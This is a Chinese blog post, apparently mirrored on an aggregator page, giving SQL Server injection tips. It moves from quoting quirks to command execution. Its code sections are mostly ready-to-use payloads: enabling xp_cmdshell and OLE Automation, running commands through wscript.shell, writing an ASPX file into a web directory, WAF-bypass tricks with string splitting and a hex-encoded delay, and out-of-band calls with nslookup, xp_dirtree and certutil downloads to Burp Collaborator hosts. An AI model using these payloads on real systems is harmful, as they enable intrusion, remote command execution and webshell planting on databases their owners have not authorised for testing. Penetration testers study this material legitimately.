当前位置:Gxlcms > 数据库问题 > Sql server注入一些tips

Sql server注入一些tips

时间:2021-07-01 10:21:17 帮助过:24人阅读

1.sql server兼容性可以说是最差的。 举例: select x from y where id=1 字符串查询 select x from y where id=1 这是会报错的,不允许的 select x from y where id="1" 假设y表有列名name,那么 select x from y where id="name" 为真。 那么利用这个特性我们可以爆破这个表的列名。 sql server下,挖掘注入就是用单引号(),双引号的场景很少,但是也有。 sql server不支持1-1=0这种运算,他会认为你是错误的,两个字符串无法进行相减,如果你是1-0他会进行类型转换不会出错。 修改: update x set name=admin where id=1 如果id处存在注入,那么本质上就是个where条件查询注入,查询怎么注入他就怎么注入。 update x set name="admin" where id=1 他会报错,没有人会这样写,用双引号。 测试sql server 修改注入,只能是aaa+bbb=aaabbb,如果可以就是注入。 或者是aaa‘‘aaa‘‘‘ 除order by/group by外注入: 环境场景:当输入id->输出id相关数据,输入name,出现name相关数据,可能是order by还有可能是什么? ""是sql servr标识符,而不是字符串,他和mysql不一样 还有可能是这样的: select "name" from x 那么你可以这样去探测:name","id 总结:测试sql server注入使用双引号测试的场景很少,尝试"是不明智的

    

    sql server注入到命令执行一些tips:

    

  1. <span style="color: rgba(0, 0, 0, 1)">基础:
  2. 开启xp_cmdshell
  3. </span><span style="color: rgba(0, 0, 255, 1)">EXEC</span> sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">show advanced options</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span>;<span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span>;<span style="color: rgba(0, 0, 255, 1)">EXEC</span> sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">xp_cmdshell</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span>;<span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span><span style="color: rgba(0, 0, 0, 1)">;
  4. 执行命令:
  5. </span><span style="color: rgba(0, 0, 255, 1)">exec</span> master..xp_cmdshell <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">ping dnslog</span><span style="color: rgba(255, 0, 0, 1)">‘</span>
  6. <span style="color: rgba(128, 0, 0, 1); font-weight: bold">2</span><span style="color: rgba(0, 0, 0, 1)">.启用sp_oacreate
  7. </span><span style="color: rgba(0, 0, 255, 1)">EXEC</span> sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">show advanced options</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span><span style="color: rgba(0, 0, 0, 1)">;   
  8. </span><span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span> <span style="color: rgba(0, 0, 255, 1)">WITH</span><span style="color: rgba(0, 0, 0, 1)"> OVERRIDE;   
  9. </span><span style="color: rgba(0, 0, 255, 1)">EXEC</span> sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">Ole Automation Procedures</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span><span style="color: rgba(0, 0, 0, 1)">;   
  10. </span><span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span> <span style="color: rgba(0, 0, 255, 1)">WITH</span><span style="color: rgba(0, 0, 0, 1)"> OVERRIDE;
  11. 执行命令:
  12. </span><span style="color: rgba(0, 0, 255, 1)">declare</span> <span style="color: rgba(0, 128, 0, 1)">@shell</span> <span style="color: rgba(0, 0, 255, 1)">int</span> <span style="color: rgba(0, 0, 255, 1)">exec</span> sp_oacreate <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">wscript.shell</span><span style="color: rgba(255, 0, 0, 1)">‘</span>,<span style="color: rgba(0, 128, 0, 1)">@shell</span> output <span style="color: rgba(0, 0, 255, 1)">exec</span> sp_oamethod <span style="color: rgba(0, 128, 0, 1)">@shell</span>,<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">run</span><span style="color: rgba(255, 0, 0, 1)">‘</span>,<span style="color: rgba(0, 0, 255, 1)">null</span>,<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">c:\windows\system32\cmd.exe /c whoami >c:\\1.txt</span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(0, 0, 0, 1)">
  13. ;</span><span style="color: rgba(0, 0, 255, 1)">declare</span><span style="color: rgba(128, 128, 128, 1)">+%</span>40shell<span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 0, 255, 1)">int</span><span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 0, 255, 1)">exec</span><span style="color: rgba(128, 128, 128, 1)">+</span>sp_oacreate<span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">wscript.shell</span><span style="color: rgba(255, 0, 0, 1)">‘</span>,<span style="color: rgba(128, 128, 128, 1)">%</span>40shell<span style="color: rgba(128, 128, 128, 1)">+</span>output<span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 0, 255, 1)">exec</span><span style="color: rgba(128, 128, 128, 1)">+</span>sp_oamethod<span style="color: rgba(128, 128, 128, 1)">+%</span>40shell,<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">run</span><span style="color: rgba(255, 0, 0, 1)">‘</span>,<span style="color: rgba(0, 0, 255, 1)">null</span>,<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">c%3a\windows\system32\nslookup.exe%20"http://2ruqida2pbiyia3mnwnsaiadu40vok.burpcollaborator.net"</span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(0, 0, 0, 1)">;
  14. ;</span><span style="color: rgba(0, 0, 255, 1)">declare</span><span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 128, 0, 1)">@f</span><span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 0, 255, 1)">int</span>,<span style="color: rgba(0, 128, 0, 1)">@g</span><span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 0, 255, 1)">int</span>;<span style="color: rgba(0, 0, 255, 1)">exec</span><span style="color: rgba(128, 128, 128, 1)">+</span>sp_oacreate<span style="color: rgba(128, 128, 128, 1)">+%</span>27Scripting.FileSystemObject<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span>,<span style="color: rgba(0, 128, 0, 1)">@f</span><span style="color: rgba(128, 128, 128, 1)">+</span>output;<span style="color: rgba(0, 0, 255, 1)">EXEC</span><span style="color: rgba(128, 128, 128, 1)">+</span>SP_OAMETHOD<span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 128, 0, 1)">@f</span>,<span style="color: rgba(128, 128, 128, 1)">%</span>27CreateTextFile<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span>,<span style="color: rgba(0, 128, 0, 1)">@f</span><span style="color: rgba(128, 128, 128, 1)">+</span>OUTPUT,<span style="color: rgba(128, 128, 128, 1)">%</span>27d:\Dzts\zt\admin\<span style="color: rgba(128, 0, 0, 1); font-weight: bold">65</span>.txt<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span>,<span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span>;<span style="color: rgba(0, 0, 255, 1)">EXEC</span><span style="color: rgba(128, 128, 128, 1)">+</span>sp_oamethod<span style="color: rgba(128, 128, 128, 1)">+</span><span style="color: rgba(0, 128, 0, 1)">@f</span>,<span style="color: rgba(128, 128, 128, 1)">%</span>27WriteLine<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span>,<span style="color: rgba(0, 0, 255, 1)">null</span>,<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span><span style="color: rgba(128, 128, 128, 1)"><%</span>@<span style="color: rgba(128, 128, 128, 1)">+</span>Page<span style="color: rgba(128, 128, 128, 1)">+</span>Language<span style="color: rgba(128, 128, 128, 1)">=</span>"C<span style="color: rgba(128, 128, 128, 1)">%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">23</span>"<span style="color: rgba(128, 128, 128, 1)">%><%+</span>Response.Write("hello,world");<span style="color: rgba(128, 128, 128, 1)">+%>%</span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">27</span><span style="color: rgba(0, 128, 128, 1)">--
  15. </span><span style="color: rgba(128, 0, 0, 1); font-weight: bold">3</span><span style="color: rgba(0, 0, 0, 1)">.调用sp_oamethod
  16. 关于bypass:
  17. </span><span style="color: rgba(0, 0, 255, 1)">exec</span><span style="color: rgba(128, 128, 128, 1)">=</span><span style="color: rgba(0, 0, 255, 1)">execute</span><span style="color: rgba(0, 0, 0, 1)">
  18. 原语句:</span><span style="color: rgba(0, 0, 255, 1)">execute</span> master..xp_dirtree <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">c:</span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(0, 0, 0, 1)">
  19. 改造:</span><span style="color: rgba(0, 0, 255, 1)">execute</span>(<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">master..xp_dirtree "c:" </span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(0, 0, 0, 1)">)
  20. 再次改造:</span><span style="color: rgba(0, 0, 255, 1)">execute</span>(<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">master..xp_dirtree "\\im86rc9bogsvyfv87zip9sz34uaky9.burpcollaborator.net"</span><span style="color: rgba(255, 0, 0, 1)">‘</span> )

  技术图片

 

 

 

  

  1. <span style="color: rgba(0, 0, 0, 1)">bypass执行命令:
  2. </span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">;execute(</span><span style="color: rgba(255, 0, 0, 1)">‘</span>xp_c<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">%2b</span><span style="color: rgba(255, 0, 0, 1)">‘</span>mdshell " certutil.exe <span style="color: rgba(128, 128, 128, 1)">-</span>urlcache <span style="color: rgba(128, 128, 128, 1)">-</span>split <span style="color: rgba(128, 128, 128, 1)">-</span>f http:<span style="color: rgba(128, 128, 128, 1)">//</span>cyen6bl8kg2svupmggzc6dk1zs5it7.burpcollaborator.net"<span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">);--%20111</span>

 

  

  1. <span style="color: rgba(0, 0, 0, 1)">开启xp_cmdshell bypass:
  2. </span><span style="color: rgba(0, 0, 255, 1)">execute</span>("sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">show advanced options</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span>");<span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span>;<span style="color: rgba(0, 0, 255, 1)">execute</span>("sp_configure <span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">xp_cmdshell</span><span style="color: rgba(255, 0, 0, 1)">‘</span>, <span style="color: rgba(128, 0, 0, 1); font-weight: bold">1</span>;<span style="color: rgba(0, 0, 255, 1)">RECONFIGURE</span><span style="color: rgba(0, 0, 0, 1)">");
  3. sql server专属特性:
  4. </span><span style="color: rgba(0, 0, 255, 1)">select</span> 1e1select <span style="color: rgba(255, 0, 255, 1)">user</span><span style="color: rgba(0, 0, 0, 1)"> 
  5. 相当于执行select 1e1 和select </span><span style="color: rgba(255, 0, 255, 1)">user</span><span style="color: rgba(0, 0, 0, 1)">,bypass waf
  6. </span><span style="color: rgba(255, 0, 0, 1)">‘</span><span style="color: rgba(255, 0, 0, 1)">select 1e1declare @s varchar (8000) set @s=0x77616974666F722064656C61792027303A303A3227 exec (@s) -- a
  7. 案例:
  8. aspx/.net站点支持get/post/cookie</span>

  把get参数放到cookie中:技术图片

 

 

      

Sql server注入一些tips

标签:weight   修改   loading   总结   char   OLE   ide   ida   ora   

人气教程排行

本站所有资源全部来源于网络,若本站发布的内容侵害到您的隐私或者利益,请联系我们删除!